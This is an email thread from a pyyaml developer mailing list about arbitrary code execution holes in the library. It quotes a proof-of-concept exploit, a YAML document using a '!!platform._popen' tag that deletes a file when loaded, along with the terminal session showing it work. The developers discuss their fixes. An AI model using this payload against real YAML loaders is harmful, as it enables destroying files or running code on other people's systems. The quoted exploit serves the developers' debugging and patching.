From: Seth de l'I. <set...@ge...> - 2005-01-13 00:02:22
|
Hello, I've been trying to take a look at the security issues raised in this thread on the python mailing list: http://www.gossamer-threads.com/lists/python/python/352547?do=post_view_threaded#352547 I think my recent modifications to pyyaml[1] (removing all exec and eval statements and directly parsing escape sequences in double quoted strings) should address the arbitrary code execution vulnerabilies described here: http://www.gossamer-threads.com/lists/python/python/352612?do=post_view_threaded#352612 The above post also includes this recipe for an expoit: [Andrew-Dalkes-Computer:~/cvses/pyyaml/trunk] dalke% cat rmfile.yaml --- !!platform._popen bufsize: ~ mode: r pipe: ~ tmpfile: delete_this_file.txt % ls -l delete_this_file.txt -rw-r--r-- 1 dalke staff 28 19 Sep 23:00 delete_this_file.txt % python Python 2.4a2 (#1, Aug 29 2004, 22:30:12) [GCC 3.3 20030304 (Apple Computer, Inc. build 1495)] on darwin Type "help", "copyright", "credits" or "license" for more information. >>> import yaml >>> yaml.loadFile("rmfile.yaml").next() <platform._popen instance at 0x8b940> >>> ^D % ls -l delete_this_file.txt ls: delete_this_file.txt: No such file or directory % I was unable to recreate this with the SHowell code. The author of that post checked code out of SVN, so I assume it came from Tim's code base at pollination.net (the SVN archive is spitting out errors so I couldn't check it out myself) If you're around Tim, did you make any changes that might have created this vulnerability? I don't see any case where the __init__ function of a class would be called automagically. It looks to me like data gets copied into the object's __dict__ and we're all done. Thanks, Seth [1] http://ubertechnique.com/seth/pyyaml/pyyaml-0.32.3 GNU Arch http://ubertechnique.com/seth/arch/ category pyyaml |
From: Tim P. <ti...@po...> - 2005-01-13 09:25:30
|
On Wed, 2005-01-12 at 16:02 -0800, Seth de l'Isle wrote: > If you're around Tim, did you make any changes that might have created > this vulnerability? I don't see any case where the __init__ function of > a class would be called automagically. It looks to me like data gets > copied into the object's __dict__ and we're all done. > I'll check the svn repsository and give you access Seth... I don't have time to do too much on it at the moment but I'll help as much as possible. ahh just checked the website.. I think our trac was updated but obviously hadn't been migrated through to the pyyaml site.. what a mess. It will be fixed sooon :-) Tim |